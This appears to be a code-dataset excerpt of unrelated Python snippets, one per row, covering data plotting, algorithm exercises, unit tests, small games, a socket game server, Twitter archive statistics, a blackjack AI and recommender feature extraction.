for i in range(0, df.shape[0]):
plt.scatter(df['Polarity'][i], df['Subjectivity'][i], color='Blue')
plt.title('Sentiment Analysis')
plt.xlabel('Polarity')
plt.ylabel('Subjectivity')
st.pyplot()
#Show the value counts
df['Analysis'].value_counts()
#plot and visualize the counts
plt.title('Sentiment Analysis')
plt.xlabel('Sentiment')
plt.ylabel('Counts')
df['Analysis'].value_counts().plot(kind='bar')
st.pyplot()
|
992,113 | e3b14c6b22157d4504db870bf38f7311b4a479b1 | g = sns.JointGrid(x="total_bill", y="tip", data=tips)
g = g.plot(sns.regplot, sns.distplot)
|
992,114 | 68f9f5dbcacb2b11ca64878e7b7c32ed3af9daf4 | # Рекурсивная функция для чисел Фибоначчи
def fib(n):
# Условия выхода из рекурсии
if n == 1:
return 1
elif n == 0:
return 0
else:
# Рекурсивный вызов
return fib(n-1) + fib(n-2)
# Ввод кол-ва чисел
n = int(input())
# Список для чисел
nums = []
# Открываем файл
f = open('out.txt', 'w')
# Заполняем список
for i in range(n):
nums.append(fib(i))
# Вывод на консоль
for i in range(n):
print(nums[i], end=' ')
print('\n')
for i in range(n):
print(bin(nums[i]), end=' ')
print('\n')
for i in range(n):
print(hex(nums[i]), end=' ')
# Вывод в файл
for i in range(n):
f.write(str(nums[i])+'\t'+str(bin(nums[i]))+'\t'+str(hex(nums[i]))+'\n')
# Закрываем файл
f.close()
|
992,115 | 1e62cfb4a71af196cb4a4c011f7c7e5a6f1416c5 |
class Db:
DEPTH_PARAM_NAME = 'depth'
def __init__(self, conn, sql):
self.conn = conn
self.cursor = conn.cursor()
self.sql = sql
self.depth = None
def setup(self, depth):
self.depth = depth
self.cursor.execute(self.sql.create_word_table_sql(depth))
self.cursor.execute(self.sql.create_index_sql(depth))
self.cursor.execute(self.sql.create_param_table_sql())
self.cursor.execute(self.sql.set_param_sql(), (self.DEPTH_PARAM_NAME, depth))
def _get_word_list_count(self, word_list):
if len(word_list) != self.get_depth():
raise ValueError('Expected %s words in list but found %s' % (self.get_depth(), len(word_list)))
self.cursor.execute(self.sql.select_count_for_words_sql(self.get_depth()), word_list)
r = self.cursor.fetchone()
if r:
return r[0]
else:
return 0
def get_depth(self):
if self.depth == None:
self.cursor.execute(self.sql.get_param_sql(), (self.DEPTH_PARAM_NAME,))
r = self.cursor.fetchone()
if r:
self.depth = int(r[0])
else:
raise ValueError('No depth value found in database, db does not seem to have been created by this utility')
return self.depth
def add_word(self, word_list):
count = self._get_word_list_count(word_list)
if count:
self.cursor.execute(self.sql.update_count_for_words_sql(self.get_depth()), [count + 1] + word_list)
else:
self.cursor.execute(self.sql.insert_row_for_words_sql(self.get_depth()), word_list + [1])
def commit(self):
self.conn.commit()
def get_word_count(self, word_list):
counts = {}
sql = self.sql.select_words_and_counts_sql(self.get_depth())
for row in self.cursor.execute(sql, word_list):
counts[row[0]] = row[1]
return counts
|
992,116 | 38ebe623c99052bc0726048e10fe3735788e00b0 | from typing import Callable, List
from dataset_specific.ists.parse import iSTSProblemWChunk
def get_similarity_table(problem: iSTSProblemWChunk,
score_chunk_pair: Callable[[str, str], float]) -> List[List[float]]:
n_chunk1 = len(problem.chunks1)
n_chunk2 = len(problem.chunks2)
table = []
for i in range(n_chunk1):
arr = []
for j in range(n_chunk2):
chunk1: str = problem.chunks1[i]
chunk2: str = problem.chunks2[j]
arr.append(score_chunk_pair(chunk1, chunk2))
table.append(arr)
return table
|
992,117 | a37e043abe4afc2c17bd5066ca08c174fd842577 | from plasmapy.classes.sources import openpmd_hdf5
from plasmapy.utils import DataStandardError
from plasmapy.data.test import rootdir
from astropy import units as u
from typing import Union, Tuple, List
import os
import pytest
class TestOpenPMD2D:
"""Test 2D HDF5 dataset based on OpenPMD."""
# Downloaded from
# https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-2d.tar.gz
# per the Creative Commons Zero v1.0 Universal license
h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000255.h5"))
def test_has_electric_field_with_units(self):
assert self.h5.electric_field.to(u.V / u.m)
def test_correct_shape_electric_field(self):
assert self.h5.electric_field.shape == (3, 51, 201)
def test_has_charge_density_with_units(self):
assert self.h5.charge_density.to(u.C / u.m**3)
def test_correct_shape_charge_density(self):
assert self.h5.charge_density.shape == (51, 201)
def test_has_magnetic_field(self):
with pytest.raises(AttributeError):
self.h5.magnetic_field
def test_has_electric_current(self):
with pytest.raises(AttributeError):
self.h5.electric_current
class TestOpenPMD3D:
"""Test 3D HDF5 dataset based on OpenPMD."""
# Downloaded from
# https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-3d.tar.gz
# per the Creative Commons Zero v1.0 Universal license
h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000100.h5"))
def test_has_electric_field_with_units(self):
assert self.h5.electric_field.to(u.V / u.m)
def test_correct_shape_electric_field(self):
assert self.h5.electric_field.shape == (3, 26, 26, 201)
def test_has_charge_density_with_units(self):
assert self.h5.charge_density.to(u.C / u.m**3)
def test_correct_shape_charge_density(self):
assert self.h5.charge_density.shape == (26, 26, 201)
def test_has_magnetic_field(self):
with pytest.raises(AttributeError):
self.h5.magnetic_field
def test_has_electric_current(self):
with pytest.raises(AttributeError):
self.h5.electric_current
class TestOpenPMDThetaMode:
"""Test thetaMode HDF5 dataset based on OpenPMD."""
# Downloaded from
# https://github.com/openPMD/openPMD-example-datasets/blob/draft/example-thetaMode.tar.gz
# per the Creative Commons Zero v1.0 Universal license
h5 = openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "data00000200.h5"))
def test_has_electric_field_with_units(self):
assert self.h5.electric_field.to(u.V / u.m)
def test_correct_shape_electric_field(self):
assert self.h5.electric_field.shape == (3, 3, 51, 201)
def test_has_charge_density_with_units(self):
assert self.h5.charge_density.to(u.C / u.m**3)
def test_correct_shape_charge_density(self):
assert self.h5.charge_density.shape == (3, 51, 201)
def test_has_magnetic_field_with_units(self):
assert self.h5.magnetic_field.to(u.T)
def test_correct_shape_magnetic_field(self):
assert self.h5.magnetic_field.shape == (3, 3, 51, 201)
def test_has_electric_current_with_units(self):
assert self.h5.electric_current.to(u.A * u.kg / u.m**3)
def test_correct_shape_electric_current(self):
assert self.h5.electric_current.shape == (3, 3, 51, 201)
units_test_table = [
((1., 1., 0., -1., 0., 0., 2.),
u.m * u.kg / u.amp * u.cd ** 2),
((1, 0, 1, 2, 0, 0, 0),
u.m * u.s * u.amp ** 2),
([-3., 0., 1., 1., 0., 0., 0.],
u.coulomb / u.m**3),
([2, 1, -3, -2, 0, 0, 0],
u.ohm)
]
@pytest.mark.parametrize("openPMD_dims, expected", units_test_table)
def test_fetch_units(openPMD_dims, expected: Union[Tuple, List]):
units = openpmd_hdf5._fetch_units(openPMD_dims)
assert units == expected
def test_unavailable_hdf5():
with pytest.raises(FileNotFoundError):
openpmd_hdf5.HDF5Reader(hdf5="this_file_does_not_exist.h5")
def test_non_openpmd_hdf5():
with pytest.raises(DataStandardError):
openpmd_hdf5.HDF5Reader(hdf5=os.path.join(rootdir, "blank.h5"))
|
992,118 | 9979b99235b5a290576e6cacb1649026353fea4e | import unittest
class Solution:
# The largest rectangle can be obtained by iterating over all height[i], finding heights[r] and heights[l],
# where l < i and heights[l] is the first bar < heights[i], and r > i and height[r] is the first bar < heights[i],
# then multiplying the height (h = height[i]) by the width (r - l - 1).
# We could do this for every i, finding r and l, which takes quadratic time.
# The stack base solution takes linear time. The idea is to maintain a stack of bar indices. For index j, stack[j]
# would be an index of heights, and heights[stack[j-1]] would be the first shorter (or equal*) bar left to heights[stack[j]].
# In otherwords, for all bar indices in the stack, those bars' left bar has been determined. And their right bar
# is still currently in search.
# *turns out this won't affect the algorithm
# The way the invariant is maintained is as we iterate through heights,
# if heights[curr] >= heights[stack[-1]], then for bar curr,
# the first shorter (or equal) left bar is heights[stack[-1]].
# Then we append curr to stack. Invariant is maintained.
# if heights[curr] < heights[stack[-1]], then that means for all bars on the stack whose value > heights[curr],
# their first shorter right bar is heights[curr], so we pop them off,
# calculate the area, and update our answer. After popping them all off,
# it should be that heights[stack[-1]] <= heights[curr], then we append curr to stack, so invariant is maintained.
def largestRectangleArea(self, heights) -> int:
# The -1 is there to ensure that the algorithm works when calculating the width
stack = [-1]
ans = 0
curr = 0
while curr < len(heights):
# For the last few bars on the stack that all have values larger than the curr bar, we found their right bar
while stack[-1] != -1 and heights[curr] < heights[stack[-1]]:
i = stack.pop()
h = heights[i]
r = curr # The (index of) first shorter bar to the right of bar i
l = stack[-1] # The (index of) first shorter bar to the left of bar i
area = h * (r - l - 1)
ans = max(area, ans)
stack.append(curr)
curr += 1
# if after iteration, the stack is not empty, that means some bar does not have a first shorter right bar
# i.e., the heights array might have a nondecreasing subarray towards the end. Set r to len(heights) in order
# for the width calculation to work
r = len(heights)
while stack[-1] != -1:
i = stack.pop()
h = heights[i]
l = stack[-1]
area = h * (r - l - 1)
ans = max(area, ans)
return ans
class TestSolution(unittest.TestCase):
def test_input1(self):
self.assertEqual(Solution().largestRectangleArea([5, 1, 6, 3, 5, 2]), 9)
def test_input2(self):
self.assertEqual(Solution().largestRectangleArea([6, 7, 5, 2, 4, 5, 9, 3]), 16)
if __name__ == '__main__':
unittest.main()
|
992,119 | 61b134d6fbcbf9efff18abb863ccdba0af2ba6e5 | import random
score = 0
sys_score = 0
print('''Yapacağınız hamleyi girin:
1)Taş
2)Kağıt
3Makas''')
while True:
if score == 3:
print("Maçı sen kazandın")
break
if sys_score == 3:
print("Maçı system kazandı")
break
hamle = int(input("Hamlenizi giriniz:"))
sys_hamle = random.randrange(1,4)
if hamle == sys_hamle:
print("Berabere kimse puan alamadı")
continue
elif hamle == 1 and sys_hamle == 2:
print("Kağıt taşı sarar system 1 puan kazandı")
sys_score+=1
continue
elif hamle == 1 and sys_hamle == 3:
print("Taş makası ezer sen 1 puan kazandın")
score+=1
continue
elif hamle == 2 and sys_hamle == 1:
print("Kağıt taşı sarar sen 1 puan kazandın")
score+=1
continue
elif hamle == 2 and sys_hamle == 3:
print("Makas kağıdı keser system 1 puan kazandı")
sys_score+=1
continue
elif hamle == 3 and sys_hamle == 1:
print("Taş makası ezer system 1 puan kazandı")
sys_score+=1
continue
elif hamle == 3 and sys_hamle == 2:
print("Makas kağıdı ezer sen 1 puan kazandın")
score+=1
continue
else:
print('''Sadece bunlar:
1)Taş
2)Kağıt
3Makas''')
|
992,120 | 682998b2ef695b01e6992e1576ba1508f8f96995 | def read_file(fnm):
fp=open(fnm,'r')
t=[]
for line in fp:
line=line.strip().split(',')
t.append(line)
print(t)
def main():
x="vet.txt"
read_file(x)
main()
|
992,121 | cc3e8b6a5d142c896438c8da736a57462fbd476f | #!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
=============
Main
=============
Aquest mòdul és el que s'haurà d'inicialitzar per obtenir tota la funcionalitat.
Per començar es crearà una instancia de la :class:`iTICApp.iTICApp` i de :class:`Interpret.Interpret`. Al inicialitzar
l'intèrpret se li passarà unes quantes funcions predefinides. L'usuari podrà saber quines són escribint la commanda
help me, que li explicarà que fa cada funció i quins paràmetres requereix. A partir d'aquí, el que s'encarregarà
d'organitzar-ho tot serà l'intèrpret
Per guardar la xarxa social i que sigui accessible per totes les funcions hem inicialitzat :class:`iTICApp.iTICApp` a fora de
__name__ == "__main__" com a una variable global:
.. code-block:: python
i = iTICApp()
"""
from Interpret import *
from iTICApp import *
from getpass import getpass
i = iTICApp()
def usuari(nick):
"""
Funció per afegir usuari a la xarca social
:param nick: El nick del usuari que es vol registrar
"""
if(len(nick) > 1):
print "El nick no pot tenir espais"
return
nick = nick[0]
if(nick in i.getUsuaris()):
print "El usuari", nick, "ja existeix"
return
email = raw_input("Email: ")
password = getpass("Password: ")
i.afegirUsuari(nick,email,password)
def hashtag(id):
"""
Afegeix un Hashtag a la xarxa social
:param id: el id del hashtag a afegir
"""
if (len(id) > 1):
print "El hashtag no pot tenir espais"
return
id = id[0]
if (id in i.getHashtags()):
print "Aquest hashtag ja existeix"
i.afegeixHashtag(id)
def publicar (info):
"""
Publicarà un post a l'usuari
:param info: Llista de strings que contindrà en primer lloc el nick de l'usuari, en segon lloc *un* hashtag i
en tercer lloc el contingut del post. Per afegir més hashtags ja es podrà fer amb :func:`Main.afegirHashtags`
"""
if(len(info) < 3):
print "Has d'incloure com a mínim tres paràmetres: nick, id i post"
nick = info[0]
id = info[1]
post=" ".join(info[2:])
i.publicarPost(nick, id, post)
def printT(info):
"""
Printeja la info demanada. Hi ha varis modes:
1. Users: Printeja els usuaris
2. Posts: Printeja els posts creats en la xarxa
#. Posts-user: Printeja els posts d'un usuari
#. Followers-user: Printeja els followers d'un usuari
#. Following-user: Printeja a qui està seguint l'usuari
#. Following-posts: Printeja els posts de les persones que segueix un usuari ordenats cronològicament (invers)
:param info: Llista de strings on el primer serà el mode de printeig descrit anteriorment
"""
ent = info[0]
if(ent == "users"):
i.users()
elif ent == "posts":
i.posts()
elif ent == "posts-user":
if(len(info) <= 1):
print "No has introduit el nick de l'usuari"
return
for nick in info[1:]:
i.postsUser(nick)
elif ent == "followers-user":
if (len(info) != 2):
print "No has introduit el nick d'un usuari"
return
i.printFollowers(info[1])
elif ent == "following-user":
if (len(info) != 2):
print "No has introduit el nick d'un usuari"
return
i.printFollowing(info[1])
elif(ent == "following-posts"):
if (len(info) != 2):
print "No has introduit el nick d'un usuari"
return
i.printFollowingPosts(info[1])
else:
print "El primer paràmetre ha de ser users, posts, posts-user, followers-user, following-user o following-posts"
def afegirHashtags(info):
"""
S'utilitza per afegir varis hashtags en un post ja creat
:param info: Llista de strings on el primer serà el id del post i la resta seran els nous hashtags a afegir
"""
if (len(info) < 2):
print "Es necessiten dos paràmetres: postId i hasthatgs"
postId = info[0]
hashtags = info[1:]
for hashtagId in hashtags:
i.afegirHastagAlPost(postId, hashtagId)
def help(i):
"""
Printeja una llista de les funcions existents a l'interpret i com funcionen
:param i: Paràmetre inútil requerit únicament perquè l'interpret funcioni
"""
print "Ajuda per a fer instruccions:"
print "- usuari <nick> -> Crea un usuari"
print "- hashtag <id> -> Afegeix un hashtag a la xarxa Social"
print "- publicar <nick> <hastag (únic)> <contingut post> -> Afegeix un post a l'usuari <nick>"
print "- afHashtag <postId> [<hashtags>] -> Afegeix hashtags al post <id>"
print "- follow <seguidor> <usuari a seguir> -> Es segueix a un usuari"
print "- followers <nick> -> Printeja el nombre de followers d'un usuari"
print "- print <ent> [<nick>] -> Per printejar infotmació. Ent pot ser:"
print "0. users -> no és necessari posar més paràmetres. Mostrarà una llista completa d'usuaris"
print "1. posts -> tampoc és necessari posr més paràmetres. Mostrarà una llista de tots els posts"
print "2. posts-user -> requereix un altre paràmetre: el nick de l'usuari del qual volem saber els posts. Si ho vols saber de més d'un introdueixne els que necessitis"
print "3. followers-user -> printeja els nicks dels followers d'un usuari"
print "4. following-user -> printeja els nicks usuaris que segueix l'usuari"
print "5. following-posts -> printeja els posts dels usuaris que segueix l'usuari (el paràmetre necessàri és el nick)"
def follow(nicks):
"""
S'utilitza per fer que un usuari en segueixi un altre
:param nicks: Llista amb dos nicks dels usuaris: el primer serà el que seguirà i el segon el que serà seguit
"""
if(len(nicks) != 2):
print "Has d'introduir dos usuaris (persona que segueix, persona a seguir)"
return
i.follow(nicks[0], nicks[1])
def userFollowers(nick):
"""
Printeja el nombre de followers i de persones que segueix
:param nick: Nick de l'usuari
"""
if (len(nick) != 1):
print "Has d'introduir només un nick"
return
i.userFollow(nick[0])
if(__name__ == "__main__"):
usuari(["Ferran"])
usuari(["David"])
usuari(["Eloi"])
publicar(["Ferran", "vida", "ashdoahd", "akjshdkjah"])
publicar(["Eloi", "vida", "ashdoahd", "akjshdkjah"])
print "Per ajuda escriu - help me"
interpret = Interpret()
interpret.afegeixOrdre("usuari", usuari)
interpret.afegeixOrdre("hashtag", hashtag)
interpret.afegeixOrdre("publicar",publicar)
interpret.afegeixOrdre("print", printT)
interpret.afegeixOrdre("afHashtag", afegirHashtags)
interpret.afegeixOrdre("follow", follow)
interpret.afegeixOrdre("followers", userFollowers)
interpret.afegeixOrdre("help", help)
interpret.setPrompt("- ")
interpret.run()
|
992,122 | be529d177f2550a63848ebd91c294039d9e297bf | # created by KUMAR SHANU
# 1. Binary Search
# https://leetcode.com/problems/binary-search/
class Solution:
def search(self, nums: List[int], target: int) -> int:
# find boundaries
l, r = 0, len(nums) - 1
while l <= r:
# find middle element
mid = l + (r - l) // 2
# base case
# return index if middle element is equal to target
if nums[mid] == target:
return mid
# if middle element is smaller than target
# reduce the search to left subarray
if nums[mid] < target:
l = mid + 1
# if middle element is smaller than target
# reduce the search to left subarray
else:
r = mid - 1
return -1
|
992,123 | ad3dac92d738288460ce0c2091d4e46b27b3e768 | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 31 16:23:50 2019
@author: Luke
"""
class Ipython():
@staticmethod
def run_from_ipython():
try:
__IPYTHON__
return True
except NameError:
return False
class timing():
import threading
from datetime import datetime, timedelta
local = threading.local()
class ExecutionTimeout(Exception): pass
def start(max_duration = timedelta(seconds=1)):
local.start_time = datetime.now()
local.max_duration = max_duration
def check():
if datetime.now() - local.start_time > local.max_duration:
raise ExecutionTimeout()
def do_work():
start()
while True:
check()
# do stuff here
return 10
def df_islarge(df):
if df.memory_usage().sum()>100*10^6: return True
else: return False
def df_describe(df, col_details = True, columns = None):
"""
returns dataframe statistics
col_details : column analysis
"""
try: #for pandas series compatability
print('Number of rows: {:23} \nNumber of columns: {:20} \nDataframe size: {:20} mb'
.format(len(df), len(df.columns), df.memory_usage().sum()/1000000))
except:
print('Number of rows: {:23} \nDataframe size: {:20} mb'
.format(len(df), df.memory_usage().sum()/1000000))
if df_islarge(df):
print('Large dataset warning')
print('head: ')
print(df.head())
if col_details == True:
if columns == None:
print('columns: ', df.columns.values)
print(df.describe().T)
print(df.isnull().sum())
else:
for col in columns:
print('Column: {:20} \nType: {:20} \nMemory usage: {:20}'
.format(col, str(df[col].dtype), df[col].memory_usage()/1000000))
#print(df[col].describe())
print('Number of nulls: ', df[col].isnull().sum())
#######################################
#count_class_function_calls decorator
from functools import wraps
def callable(o):
return hasattr(o, "__call__")
call_count = {}
def count_calls(fn):
print("decorating" )
def new_function(*args,**kwargs):
print("starting timer" )
import datetime
before = datetime.datetime.now()
print(fn.__name__)
if call_count.get(fn.__name__) is None:
call_count[fn.__name__] = 1
else:
call_count[fn.__name__] = call_count.get(fn.__name__) + 1
print(call_count)
x = fn(*args,**kwargs)
after = datetime.datetime.now()
print("Elapsed Time: {0}".format(after-before) )
return x
return new_function
def count_class_function_calls(cls):
"""
counts and times each occasion a function is run in a class
"""
class NewCls(object):
def __init__(self,*args,**kwargs):
self.oInstance = cls(*args,**kwargs)
def __getattribute__(self,s):
"""
called whenever any attribute of a NewCls object is accessed.
This function first tries to get the attribute off NewCls. If it fails then it tries to fetch the attribute from self.oInstance (an
instance of the decorated class). If it manages to fetch the attribute from self.oInstance, and
the attribute is an instance method then `count_calls` is applied.
"""
try:
x = super(NewCls,self).__getattribute__(s)
except AttributeError:
pass
else:
return x
x = self.oInstance.__getattribute__(s)
if type(x) == type(self.__init__): # it is an instance method
return count_calls(x)
else:
return x
return NewCls
if __name__ == '__main__':
@count_class_function_calls
class test_class():
def __init__(self, a):
self.x = 5
self.a = a
#@count_calls
def fn(self):
print("ran fn")
return 2
def b(self): return self.a
my_class = test_class(5)
print(my_class.fn())
print(my_class.a)
print(my_class.b())
print(test_class.__name__)
|
992,124 | 7ed6b06464645ddd5c4ee98952e8746b16cbc691 | import requests
r = requests.get('http://0.0.0.0:8000/get_stock/DOCU')
print(r.json())
|
992,125 | 9672eecf7143e7926a2ef2617dae4e58b70b3b78 | import sys
p1 = 0
p6 = 42195
somatoria = 0
msg1 = "Marquinhos termina a prova"
msg2 = "Marquinhos nao termina"
msg3 = "Valor invalido"
p2 = int(input("posicao 2: "))
if p2 <= p1:
print(msg3)
sys.exit()
else:
d = p2 - p1
if d <= 10000:
somatoria = somatoria + d
p3 = int(input("posicao 3: "))
if p3 <= p2:
print(msg3)
sys.exit()
else:
d = p3 - p2
if d <= 10000:
somatoria = somatoria + d
p4 = int(input("posicao 4 : "))
if p4 <= p3:
print(msg3)
sys.exit()
else:
d = p4 - p3
if d <= 10000:
somatoria = somatoria + d
p5 = int(input("posicao 5 : "))
if p5 <= p4:
print(msg3)
sys.exit()
else:
d = p5 - p4
if d <= 10000:
somatoria = somatoria + d
d = p6 - p5
somatoria = somatoria + d
if somatoria != p6:
print(msg2)
else:
print(msg1)
|
992,126 | 1de95c6d05f07a5b3a08a9c71e977ae340e26cf1 | import os
class Config:
def __init__(self):
self.SQLALCHEMY_DB_URI = os.getenv("SQLALCHEMY_DB_URI", "sqlite:////data/db/tools.db")
self.SQLALCHEMY_ECHO = os.getenv("SQLALCHEMY_ECHO") == "True"
self.DEBUG = os.getenv("DEBUG") == "True"
self.SENTRY_DSN = os.getenv("SENTRY_DSN", "")
# 配置,一般是全局变量
self.FLASK_CONFIG = {
"SITE_NAME": os.getenv("SITE_NAME", "Kindle Highlights/Notes Export"),
"SITE_SLOGAN": os.getenv("SITE_SLOGAN", "Export your kindle highlights/notes(导出你的Kindle笔记)"),
"GA_CODE": os.getenv("GA_CODE"), # Google Analytics Code
"DISABLE_AD": os.getenv("DISABLE_AD") == "True",
}
config = Config()
|
992,127 | b2707e621a7d6dcdeea42654cd713f24f56ff162 | import socket
from _thread import *
server = "ip_address"
port = 5555
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.bind((server,port))
except socket.error as e :
print(str(e))
s.listen()
print("Server Initialized....\n\nWaiting FOr Connections..\n")
def readpos(str):
str = str.split(",")
return int(str[0]) , int(str[1])
def makepos(tup):
return str(tup[0]) + "," +str(tup[1])
pos = [(0,0),(400,0)]
def thread_1(conn,player):
conn.send(str.encode(makepos(pos[player])))
reply = ""
while True:
try:
data = readpos(conn.recv(2048).decode())
pos[player] = data
if len(data) < 1:
print("Discoonected from ",addr)
break
else:
if player == 1 :
reply = pos[0]
else:
reply = pos[1]
print("Recieved: ",data)
print("Sending: ",reply)
conn.sendall(str.encode(makepos(reply)))
except:
print("Error")
break
print("Disconnected..\nWaiting FOr New Connection..")
conn.close()
currentPlayer = 0
while True:
conn , addr = s.accept()
print(f"Connection Established with {addr}.. \nWaiting for data... ")
start_new_thread(thread_1,(conn,currentPlayer))
currentPlayer =+ 1
|
992,128 | 7fbf90d8d17d2de65a55409d85a78818ba0dbc87 | import json
#open twitter data
with open('/Users/maddie/Desktop/twitter-2020-02-11-a78b07526621ffada3b98a8686afc07c4602cbde62e511b321765432f525f2e7/tweet.js', 'r') as f:
data = json.loads(f.read())
"""
extract from the data:
1. percentage of my tweets which were retweets of other users content
2. percentage of my tweets which had engagement
3. hashtags from the tweets with engagment
4. time of day of tweets with engagement
5. no of tweets each day of the week
6. no of tweets each month
"""
#set up variables, lists and dictionaries
totaltweets = len(data)
retweettotal = 0
engagementtotal = 0
hashtags = []
tweetseachday = dict ()
tweetseachmonth = dict()
timeoftweetswithengagment = dict ()
tweettime = dict()
dayoftweetwithengagment = dict ()
#extract from the JSON data
for i in range(0,totaltweets):
#percentage retweets from other users
if "RT" in data[i]["tweet"]["full_text"]:
retweettotal += 1
#day tweets were made
if(data[i]["tweet"]["created_at"][0:3]) not in tweetseachday:
tweetseachday[data[i]["tweet"]["created_at"][0:3]] = 1
else:
tweetseachday[data[i]["tweet"]["created_at"][0:3]] += 1
#month tweets were made
if(data[i]["tweet"]["created_at"][3:7]) not in tweetseachmonth:
tweetseachmonth[data[i]["tweet"]["created_at"][3:7]] = 1
else:
tweetseachmonth[data[i]["tweet"]["created_at"][3:7]] += 1
#hour tweets were made
if(data[i]["tweet"]["created_at"][11:13]) not in tweettime:
tweettime[data[i]["tweet"]["created_at"][11:13]] = 1
else:
tweettime[data[i]["tweet"]["created_at"][11:13]] += 1
#percentage with engagment, the hashtags used and time of day the tweet was made
if data[i]["tweet"]["retweet_count"] != "0" or data[i]["tweet"]["favorite_count"] != "0":
engagementtotal += 1
if len(data[i]["tweet"]["entities"]["hashtags"]) > 0:
for j in range(0, len(data[i]["tweet"]["entities"]["hashtags"])):
hashtags.append(data[i]["tweet"]["entities"]["hashtags"][j]["text"])
if data[i]["tweet"]["created_at"][11:13] not in timeoftweetswithengagment:
timeoftweetswithengagment[data[i]["tweet"]["created_at"][11:13]] = 1
else:
timeoftweetswithengagment[data[i]["tweet"]["created_at"][11:13]] += 1
if(data[i]["tweet"]["created_at"][0:3]) not in dayoftweetwithengagment:
dayoftweetwithengagment[data[i]["tweet"]["created_at"][0:3]] = 1
else:
dayoftweetwithengagment[data[i]["tweet"]["created_at"][0:3]] += 1
retweetpercentage = round(retweettotal/totaltweets*100, 2)
engagmentpercentage = round(engagementtotal/totaltweets*100, 2)
|
992,129 | c8820ec3e606b6b65253606ac4eff08026d3c036 | from copy import deepcopy
from abc import ABC, abstractmethod
from ..models import Dealer, PlayerAction
from ..game_controller import *
class BaseAI(ABC):
"""
The abstract base class of all AI classes.
"""
def __init__(self, dealer_id, total_money):
self.dealer_id = dealer_id
self.initiate_state(dealer_id, total_money)
self._add_dealer_rules()
self.min_cards_in_deck = 20
def initiate_state(self, dealer_id, total_money):
self.state = {
"dealer_id": dealer_id,
"deck": [],
"dealer_cards": [],
"player_cards": [[]],
"hole_card": "",
"current_hand": "",
"hand_finished": [],
"hand_is_doubled": [],
"is_split_valid": False,
"is_double_valid": False,
"is_surrender_valid": False,
"is_insurance_valid": False,
"did_split_aces": False,
"did_buy_insurance": False,
"total_money": total_money,
"bet_amount": 0,
"is_in_game": False,
"is_in_round": False,
"dealer_message": "",
"messages": [""],
}
def _add_dealer_rules(self):
dealer = Dealer.objects.get(id=self.state["dealer_id"])
self.state.update(dealer.get_rules_dict())
def _get_valid_actions(self):
actions = [PlayerAction.hit, PlayerAction.stand]
if self.state["is_split_valid"]:
actions.append(PlayerAction.split)
if self.state["is_double_valid"]:
actions.append(PlayerAction.double)
if self.state["is_surrender_valid"]:
actions.append(PlayerAction.surrender)
if self.state["is_insurance_valid"]:
actions.append(PlayerAction.buy_insurance)
return actions
def play_game(self):
self.state["is_in_game"] = True
all_bet_states = []
all_action_states = []
if self.state["deck"] == []:
self.state["deck"] = start_game(self.state["dealer_id"])["deck"]
while self.state["is_in_game"]:
initial_money = self.state["total_money"]
self.state = start_round(
state=self.state,
bet_amount=self.decide_bet_amount(),
)
bet_state = {
"state": deepcopy(self.state),
"bet_amount": self.state["bet_amount"],
}
action_states = []
while self.state["is_in_round"]:
action = self.decide_action(valid_actions=self._get_valid_actions())
action_states.append({
"state": deepcopy(self.state),
"action": action,
})
if action == PlayerAction.hit:
self.state = player_hit(self.state)
elif action == PlayerAction.stand:
self.state = player_stand(self.state)
elif action == PlayerAction.double:
self.state = player_double(self.state)
elif action == PlayerAction.split:
self.state = player_split(self.state)
elif action == PlayerAction.surrender:
self.state = player_surrender(self.state)
elif action == PlayerAction.buy_insurance:
self.state = player_buy_insurance(self.state)
else:
raise Exception("Unexpected player action")
if self.state["total_money"] == 0 or len(self.state["deck"]) < self.min_cards_in_deck:
self.state["is_in_game"] = False
# Add outcome to state
outcome = self.state["total_money"] - initial_money
bet_state["outcome"] = outcome
for action_state in action_states:
action_state["outcome"] = outcome
# Remove hidden or irrelevant fields from states
to_remove = ["dealer_id", "deck", "hole_card", "dealer_message", "messages"]
for field in to_remove:
bet_state["state"].pop(field)
for action_state in action_states:
action_state["state"].pop(field)
# Store state in memory
all_bet_states.append(bet_state)
all_action_states.extend(action_states)
return all_bet_states, all_action_states
@abstractmethod
def decide_bet_amount(self):
return None
@abstractmethod
def decide_action(self, valid_actions):
return None
|
992,130 | a439f7b1da6fced7c66884f02c697326cbc289b2 | #!/usr/bin/python
#_*_coding:utf-8_*_
import sys
def load_users_jobroles_and_studyFields(file):
userBasicFeature = dict()
userJobrole = dict()
userStudyField = dict()
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split(" ")
user = segs[0]
jobroles = []
studyFields = []
if segs[-2] != 'NULL':
jobroles = segs[-2].split(",")
if segs[-1] != 'NULL':
styduFields = segs[-1].split(",")
userJobrole[user] = set(jobroles)
userStudyField[user] = set(studyFields)
userBasicFeature[user] = ' '.join(segs[1:88])
return userJobrole, userStudyField, userBasicFeature
def load_items_titles_and_tags(file):
itemTitle = dict()
itemStudyField = dict()
itemBasicFeature = dict()
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split(" ")
item = segs[0]
titles = []
tags = []
if segs[-4] != "NULL":
titles = segs[-4].strip().split(",")
if segs[-3] != "NULL":
tags = segs[-3].strip().split(",")
itemTitle[item] = set(titles)
itemStudyField[item] = set(tags)
itemBasicFeature[item] = ' '.join(segs[1:82])
return itemTitle, itemStudyField, itemBasicFeature
def load_user_item_pairs(file):
pairs = []
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split()
if len(segs) >= 3:
pairs.append((segs[0], segs[1], segs[2]))
else:
pairs.append((segs[0], segs[1]))
return pairs
def get_interaction_and_jaccard(set1, set2):
feature = ""
if len(set1)==0 and len(set2)==0:
feature = "0 0 0"
else:
feature = "1"
fenzi = float(len(set1.intersection(set2)))
fenmu = float(len(set1.union(set2)))
feature += " " + str(fenzi) + " " + str(fenzi/fenmu)
return feature
def get_xgboost_input(line):
items = line.strip().split()
result = ""
for i, item in enumerate(items):
if item != '0' and item != '0.0':
result += " " + str(i+1) + ":"
if item == 'NULL':
result += '-1'
else:
result += item
return result.strip()
if __name__ == "__main__":
if len(sys.argv) != 5:
print "Usage:"
